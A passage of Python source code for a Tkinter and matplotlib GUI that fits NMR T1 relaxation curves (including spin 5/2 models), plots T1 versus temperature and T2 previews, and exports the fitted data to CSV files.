-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.036*exp(-(2.91x/T1)**r)
+0.314*exp(-(9.30x/T1)**r)
+0.651*exp(-(19.1x/T1)**r)))'''
],
'Spin 5/2':[Fit_spin_5_2, ['T1', 'y0', 's', 'r'],
[15*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.029*exp(-(x/T1)**r)
+0.178*exp(-(6x/T1)**r)
+0.793*exp(-(15x/T1)**r)))'''
],
'Spin 5/2 double':[Fit_spin_5_2_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
[15*self.trace.tau_list[self.trace.mean_range[0]-5],
0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-0.5*self.trace.area_list[0]/self.trace.area_list[-1],
self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''sumi y0(1-(1+si)(
0.029*exp(-(x/T1i)**r)
+0.178*exp(-(6x/T1i)**r)
+0.793*exp(-(15x/T1i)**r)))'''
],
'Spin 5/2 1st':[Fit_spin_5_2_1st, ['T1', 'y0', 's', 'r'],
[10*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.029*exp(-(x/T1)**r)
+0.054*exp(-(3x/T1)**r)
+0.025*exp(-(6x/T1)**r)
+0.446*exp(-(10x/T1)**r)
+0.446*exp(-(15x/T1)**r)))'''
],
'Spin 5/2 1st double':[Fit_spin_5_2_1st_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
[2.5*10*self.trace.tau_list[self.trace.mean_range[0]-5],
5*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-0.5*self.trace.area_list[0]/self.trace.area_list[-1],
self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''sumi y0(1-(1+si)(
0.029*exp(-(x/T1i)**r)
+0.054*exp(-(3x/T1i)**r)
+0.025*exp(-(6x/T1i)**r)
+0.446*exp(-(10x/T1i)**r)
+0.446*exp(-(15x/T1i)**r)))'''
],
'Spin 5/2 2nd':[Fit_spin_5_2_2nd, ['T1', 'y0', 's', 'r'],
[6*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.029*exp(-(x/T1)**r)
+0.214*exp(-(3x/T1)**r)
+0.400*exp(-(6x/T1)**r)
+0.286*exp(-(10x/T1)**r)
+0.071*exp(-(15x/T1)**r)))'''
],
'Spin 5/2 2nd double':[Fit_spin_5_2_2nd_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
[2.5*6*self.trace.tau_list[self.trace.mean_range[0]-5],
0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-0.5*self.trace.area_list[0]/self.trace.area_list[-1],
self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''sumi y0(1-(1+si)(
0.029*exp(-(x/T1i)**r)
+0.214*exp(-(3x/T1i)**r)
+0.400*exp(-(6x/T1i)**r)
+0.286*exp(-(10x/T1i)**r)
+0.071*exp(-(15x/T1i)**r)))'''
],
'Spin 5/2 2nd triple':[Fit_spin_5_2_2nd_tpl, ['T11', 'T12', 'T13', 'y0', 's1', 's2', 's3', 'r'],
[2.5*6*self.trace.tau_list[self.trace.mean_range[0]-5],
0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
0.05*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-0.5*self.trace.area_list[0]/self.trace.area_list[-1],
self.trace.area_list[0]/self.trace.area_list[-1],
self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''sumi y0(1-(1+si)(
0.029*exp(-(x/T1i)**r)
+0.214*exp(-(3x/T1i)**r)
+0.400*exp(-(6x/T1i)**r)
+0.286*exp(-(10x/T1i)**r)
+0.071*exp(-(15x/T1i)**r)))'''
]
}
def Fit():
'''Executes the fit with given parameters and plots it'''
Fit_function = self.fit_names[self.combo_fit_var.get()][0]
#read values from entry boxes
start_params = dict()
for entry,param in zip(self.entry_params_start, param_list):
start_params[param]=float(entry.get())
#data points
x = self.trace.tau_list
y = self.trace.area_list
y_start = [Fit_function(xx, **start_params) for xx in x]
#check if last parameter is enabled or not
p_start = [start_params[key] for key in param_list]
if not self.check_params_start_var.get():
r_tmp = p_start.pop(-1)
self.entry_params_fit[-1].config(state='normal')
self.entry_params_fit[-1].delete(0, 'end')
self.entry_params_fit[-1].insert('end', r_tmp)
self.entry_params_fit[-1].config(state='readonly')
#run fit, p_optimal, p_covariance matrix
if not self.check_params_start_var.get():
popt,pcov = curve_fit(lambda x, *param_list: Fit_function(x, *param_list, r=r_tmp), x, y, p0=p_start)
else:
popt,pcov = curve_fit(Fit_function, x, y, p0=p_start)
#readd last parameter
if not self.check_params_start_var.get():
popt = np.append(popt, r_tmp)
y_fit = [Fit_function(xx, *popt) for xx in x]
#print values to entry boxes
for i,p in enumerate(popt):
self.entry_params_fit[i].config(state='normal')
self.entry_params_fit[i].delete(0, 'end')
self.entry_params_fit[i].insert('end','%.4g' %p)
self.entry_params_fit[i].config(state='readonly')
#update plots
self.axes_start_plot.set_ydata(y_start)
self.axes_fit_plot.set_ydata(y_fit)
self.fig_t1.canvas.draw()
#save parameters
self.trace.fit_params = popt
self.trace.fit_param_cov = pcov
self.trace.T1 = popt[0]
#if self.check_params_start_var.get():
self.trace.r = popt[-1]
#else:
# self.trace.r = 1
self.trace.y0 = popt[1]
self.trace.s = popt[2]
self.Refresh_parameters()
def Change_fit(event=None):
'''Changes the current fitting function'''
#update memory in parent
self.parent.temperatures.previous_t1['fit']=self.combo_fit_var.get()
#repack the entries
self.Fitting_frame()
#rerun
#Fit()
#implement more options later if necessary
self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
self.label_fit.pack(side='top')
self.combo_fit_var = tk.StringVar()
try:
self.combo_fit_var.set(self.parent.temperatures.previous_t1['fit'])
except KeyError:
self.combo_fit_var.set('Single Exp')
self.parent.temperatures.previous_t1['fit']='Single Exp'
self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
textvar=self.combo_fit_var)
self.combo_fit.pack(side='top')
self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
self.label_fit_fun.pack(side='top')
self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
self.label_starting_params.pack(side='top')
param_list = self.fit_names[self.combo_fit_var.get()][1]
#guesses for where params should start
start_guess = self.fit_names[self.combo_fit_var.get()][2]
## start_guess = [self.trace.tau_list[self.trace.mean_range[0]-5],
## np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
## -self.trace.area_list[0]/self.trace.area_list[-1],
## 1]
## if self.combo_fit_var.get() == 'Spin 3/2':
## start_guess[0] = start_guess[0]*6
#start parameters entry rows
self.frame_params_start = list()
self.label_params_start = list()
self.entry_params_start = list()
for i,param in enumerate(param_list):
self.frame_params_start.append(tk.Frame(self.frame_fit))
self.frame_params_start[i].pack(side='top', fill='y')
self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
self.label_params_start[i].pack(side='left', anchor='e')
self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
width=10, justify='right'))
self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
self.entry_params_start[i].pack(side='left', anchor='e')
#check button for stretch
self.check_params_start_var = tk.BooleanVar(self, 0)
try:
if self.trace.r != 1:
self.check_params_start_var.set(1)
except AttributeError: pass
self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
variable=self.check_params_start_var))
self.check_params_start.pack(side='left')
self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
self.button_fit.pack(side='top')
self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
self.label_fit_params.pack(side='top')
#fit results entry rows
self.frame_params_fit = list()
self.label_params_fit = list()
self.entry_params_fit = list()
for i,param in enumerate(param_list):
self.frame_params_fit.append(tk.Frame(self.frame_fit))
self.frame_params_fit[i].pack(side='top', fill='y')
self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
self.label_params_fit[i].pack(side='left')
self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
state='readonly', justify='right'))
self.entry_params_fit[i].pack(side='left')
#run first lap of fit
Fit()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
self.button_confirm.pack(side='bottom')
self.button_confirm.bind('<Return>', self.Confirm)
#add export csv button
self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
self.button_export.pack(side='bottom')
self.button_export.bind('<F5>', self.Export)
def Confirm(self, event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
#move to later stages
self.trace.analysed = True
def Refresh_parameters(self):
'''refreshes the parameters table'''
self.tree_parameters.delete(*self.tree_parameters.get_children())
self.trace.Get_params()
for item in GLOBAL_t1_displayed_params:
try:
pair = (item, self.trace.__dict__[item])
self.tree_parameters.insert('', 'end', values=pair)
except: pass
def Export(self, event=None):
'''Saves the datapoints of the plot to a CSV file'''
file_name = self.trace.file_key + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T1_raw', )
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['tau(s)', 'Signal(a.u.)'])
#data
for i in range(len(self.trace.tau_list)):
row = [self.trace.tau_list[i], self.trace.area_list[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Plots the T1 trend and fits it'''
#data lines
x = self.trace.tau_list
y = self.trace.area_list
#T1 plot
self.axes = self.fig_t1.add_subplot(111)
self.axes.plot(x, y, 'bo', color=colors[1], label='Data')
self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
linestyle='dashed', label='Fit start')
self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
self.axes.axvline(x=x[self.trace.mean_range[0]], color=colors[2])
self.axes.set_xscale('log')
self.axes.set_title('T1')
self.axes.set_xlabel(r'$\tau$ (s)')
self.axes.set_ylabel('Signal')
legend = self.axes.legend(loc='lower right')
self.axes.grid()
class Frame_plot_T1_t1vt(tk.Frame):
'''T1vT trend plotting'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current series
self.trace = trace
#counter for plots
self.counter = 0
#load widgets
self.Widgets()
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Confirm(event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
plt.close('all')
self.parent.traces.button_show.config(state='normal')
#split in columns
self.frame_plot_left = tk.Frame(self)
self.frame_plot_left.pack(side='left', anchor='n')
self.frame_plot_right = tk.Frame(self)
self.frame_plot_right.pack(side='left', anchor='n')
#plot frames
self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
self.frame_plot1.pack(side='top', anchor='n')
self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot2.pack(side='top', anchor='n')
self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot3.pack(side='top', anchor='n')
#buttons frame
self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
self.frame_buttons.pack(side='top', anchor='e')
#T1 plot
self.fig_t1vt = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_t1vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
self.canvas_t1vt = FigureCanvasTkAgg(self.fig_t1vt, self.frame_plot1)
self.canvas_t1vt._tkcanvas.pack()
#fr plot
self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
self.canvas_fr._tkcanvas.pack()
#stretch plot
self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
self.canvas_r._tkcanvas.pack()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
self.button_confirm.pack(side='right')
self.button_confirm.bind('<Return>', Confirm)
#plot the stuff
self.Fill_plot()
#add button to export parameters
self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
self.button_export.pack(side='right')
def Add_trace(self, trace):
'''Adds traces to plots using given trace'''
#initialize lists
x = list()
y = list()
fr = list()
r = list()
y0 = list()
s = list()
dT1 = list()
#prepare all items for export
popts = list()
pcovs = list()
for temp in self.trace:
if self.trace[temp].analysed and not self.trace[temp].disabled:
x.append(temp)
y.append(self.trace[temp].T1)
#maby calculate some center frequency at some point?
fr.append(self.trace[temp].fr)
#get stretch
try:
r.append(self.trace[temp].r)
except AttributeError:
r.append(1)
#get y0 and s if exist
try:
y0.append(self.trace[temp].y0)
s.append(self.trace[temp].s)
except AttributeError:
pass
dT1.append(np.sqrt(self.trace[temp].fit_param_cov[0][0]))
popts.append(self.trace[temp].fit_params)
pcovs.append(self.trace[temp].fit_param_cov)
name = self.trace[temp].file_key
#sort by temperature
sorting = np.argsort(x)
x = np.array(x)[sorting]
y = np.array(y)[sorting]
y2 = 1/y
fr = np.array(fr)[sorting]
r = np.array(r)[sorting]
y0 = np.array(y0)[sorting]
s = np.array(s)[sorting]
dT1 = np.array(dT1)[sorting]
popts = np.array(popts)[sorting]
pcovs = np.array(pcovs)[sorting]
#draw trace
self.axes_1.plot(x, y2, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_3.plot(x, r, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
#save for export
self.data = dict()
self.data['T'] = x
self.data['T1'] = y
self.data['fr'] = fr
self.data['r'] = r
self.data['y0'] = y0
self.data['s'] = s
self.data['dT1'] = dT1
self.data['popts'] = popts
self.data['pcovs'] = pcovs
#increase plot counter
self.counter += 1
def Export(self):
'''Saves the plotted data into a CSV file for further analysis'''
file_name = self.parent.current_trace + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T1')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['T(K)', 'T1(s)', 'fr(MHz)', 'r', 'y0', 's', 'dT1'])
#data
for i in range(len(self.data['T'])):
row = [self.data['T'][i], self.data['T1'][i], self.data['fr'][i], self.data['r'][i],
self.data['y0'][i], self.data['s'][i], self.data['dT1'][i]] + list(self.data['popts'][i])
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Creates the plots for T1vT'''
self.axes_1 = self.fig_t1vt.add_subplot(111)
self.axes_1.set_xscale('log')
self.axes_1.set_yscale('log')
self.axes_1.set_title('T1 temperature dependence')
self.axes_1.set_xlabel('Temperature (K)')
self.axes_1.set_ylabel(r'1/T1 (1/s)')
#self.axes_1.legend(loc='lower right')
self.axes_1.grid()
self.axes_2 = self.fig_fr.add_subplot(111)
self.axes_2.set_title('Center frequencies')
self.axes_2.set_xlabel('Temperature (K)')
self.axes_2.set_ylabel('Frequency (MHz)')
#self.axes_2.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_2.margins(0.05, 0.1)
self.axes_2.grid()
self.axes_3 = self.fig_r.add_subplot(111)
self.axes_3.set_title('Stretch')
self.axes_3.set_xlabel('Temperature (K)')
self.axes_3.set_ylabel('Stretch r')
#self.axes_3.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_3.margins(0.05, 0.1)
self.axes_3.grid()
class Frame_plot_T2_quick(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#starting data
self.range = self.parent.temperatures.previous_t2['mean_range'][1]
#load widgets
self.Widgets()
#run quick t2
quick_tables = trace.Quick_T2()
self.Fill_plots(*quick_tables)
#take focus away from listbox
self.focus()
#global key binds
root.bind('<Left>', self.Interrupt)
root.bind('<Right>', self.Finish)
def Finish(self, event=None):
'''Accepts the data on this screen and closes it up'''
#save data
self.trace.mean_range = (0, self.range)
self.trace.mean_shl = int(self.mean_shl)
self.trace.mean_phase = self.mean_phase
self.parent.temperatures.previous_t2['mean_range']=(0, self.range)
#hide this frame
self.pack_forget()
#close plots
plt.close('all')
#forget global key bind
root.unbind('<Right>')
root.unbind('<Left>')
#run next frame
self.parent.plot_t2_ranges = Frame_plot_T2_ranges(self.parent, self.trace)
def Interrupt(self, event=None):
'''Stops the analysis loop'''
#Destroy frame and plots
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#stop the analysis loop
self.parent.temperatures.wait.set(False)
def Widgets(self):
'''Builds all the subframes and canvases'''
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,3))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4))
self.fig_left2.subplots_adjust(bottom=0.15, left= 0.12, right=0.96, top=0.9)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#interrupt button
self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
self.button_interrupt.pack(side='left', anchor='w')
#label and edit of mean_range
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_mean = tk.Label(self.frame_left3_middle, text='Selected range:')
self.label_mean.pack(side='left')
self.entry_mean_var = tk.StringVar(self, value=self.range)
self.entry_mean = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_mean_var, width=3)
self.entry_mean.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,3.5))
self.fig_right1.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,3.5))
self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
self.canvas_right2._tkcanvas.pack()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_right, text='Confirm', command=self.Finish)
self.button_confirm.pack(side='top', anchor='ne')
def Fill_plots(self, temp_list, temp_list2, temp_set, tau_list, t2_list, phase_list, shl_list):
'''Puts the contents into the plot fields'''
#starting values
self.mean_t2 = np.mean(t2_list[:self.range])
self.mean_phase = np.mean(np.unwrap(phase_list[:self.range]))
self.mean_shl = np.round(np.mean(shl_list[:self.range]))
#x axes
n = len(tau_list)
x_list = np.linspace(1,n,n)
#plot 1, temperature stabillity
self.axes_left1 = self.fig_left1.add_subplot(111)
if abs(np.mean(temp_list) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
if abs(np.mean(temp_list2) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Temperature stabillity check')
self.axes_left1.set_xlabel('File index')
self.axes_left1.set_ylabel('Temperature (K)')
self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2
self.axes_left2 = self.fig_left2.add_subplot(111)
self.axes_left2.plot(tau_list, t2_list, 'bo', color=colors[1], label='Data')
self.axes_left2_vline = self.axes_left2.axvline(x=tau_list[self.range],
color=colors[2], label='Select')
self.axes_left2_hline = self.axes_left2.axhline(y=self.mean_t2, color=colors[0],
label='Plato')
self.axes_left2.set_yscale('log')
self.axes_left2.set_title('T2 quick check')
self.axes_left2.set_xlabel(r'$\tau$ ($\mu$s)')
self.axes_left2.set_ylabel('Signal')
#legend = self.axes_left2.legend(loc='lower right')
#legend.draggable()
self.axes_left2.grid()
#plot 3
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(x_list, np.unwrap(np.array(phase_list))*180/np.pi, marker='.',
color=colors[1], label='Phase')
self.axes_right1_hline = self.axes_right1.axhline(self.mean_phase*180/np.pi, color=colors[0], label='Mean phase')
self.axes_right1.margins(0.02, 0.1)
self.axes_right1.set_title('Phase check')
self.axes_right1.set_xlabel('File index')
self.axes_right1.set_ylabel('Phase (Deg)')
#self.axes_right1.legend(loc='lower right')
self.axes_right1.grid()
#plot 4
self.axes_right2 = self.fig_right2.add_subplot(111)
self.axes_right2.plot(x_list, shl_list, marker='.',
color=colors[1], label='SHL')
self.axes_right2_hline = self.axes_right2.axhline(self.mean_shl,
color=colors[0], label='Mean SHL')
self.axes_right2.margins(0.02, 0.1)
self.axes_right2.set_title('SHL check')
self.axes_right2.set_xlabel('File index')
self.axes_right2.set_ylabel('Shift left')
#self.axes_right2.legend(loc='lower right')
self.axes_right2.grid()
#redraw canvases
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.range = np.searchsorted(tau_list, event.xdata, side='right')
self.mean_t2 = np.mean(t2_list[:self.range])
self.mean_phase = np.mean(np.unwrap(phase_list[:self.range]))
self.mean_shl = np.round(np.mean(shl_list[:self.range]))
self.entry_mean_var.set(self.range)
#update plot
self.axes_left2_vline.set_xdata(event.xdata)
self.axes_left2_hline.set_ydata(self.mean_t2)
self.axes_right1_hline.set_ydata(self.mean_phase*180/np.pi)
self.axes_right2_hline.set_ydata(self.mean_shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_T2_ranges(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
self.offset_select = self.parent.temperatures.previous_t2['offset'][0]
self.range_l_select = self.parent.temperatures.previous_t2['integral_range'][0]
self.range_r_select = self.parent.temperatures.previous_t2['integral_range'][1]
self.mirroring = self.parent.temperatures.previous_t2['mirroring']
#load widgets
self.Widgets()
#load plots and read
self.Choose_offset(trace)
self.focus()
#global key bindings
root.bind('<Left>', self.Previous)
root.bind('<Right>', self.Confirm_offset)
def Widgets(self):
'''Builds all the subframes and canvases'''
def Set_offset(event=None):
'''Entry change of offset, replot and write value'''
try:
self.offset_select = int(self.entry_offset.get())
#update plot
self.axes_left1_vline.set_xdata(self.offset_select)
self.axes_left2_vline.set_xdata(self.offset_select)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
def Set_range(event=None):
'''Entry change of ranges, replot and save value'''
try:
self.range_l_select = int(self.entry_range_l_var.get())
self.range_r_select = int(self.entry_range_r_var.get())
self.axes_right1_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_right2_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_right1_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.axes_right2_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right3 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top')
self.frame_right3.pack(side='top', fill='x')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_left2.subplots_adjust(bottom=0.12, left= 0.08, right=0.96, top=0.93)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#buttons left
self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
self.button_previous.pack(side='left')
self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm_offset)
self.button_confirm.pack(side='right')
#check button for mirroring fid
self.check_mirroring_var = tk.BooleanVar(self, False)
if self.mirroring:
self.check_mirroring_var.set(True)
self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
self.check_mirroring.pack(side='right')
self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
self.label_mirroring.pack(side='right')
#middle frame
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_offset = tk.Label(self.frame_left3_middle, text='Selected offset:')
self.label_offset.pack(side='left')
self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
self.entry_offset = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_offset_var, width=5)
self.entry_offset.pack(side='left')
self.entry_offset.bind('<Return>', Set_offset)
self.button_set_offset = ttk.Button(self.frame_left3_middle,
text='Set offset', command=Set_offset)
self.button_set_offset.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_right1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_right2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
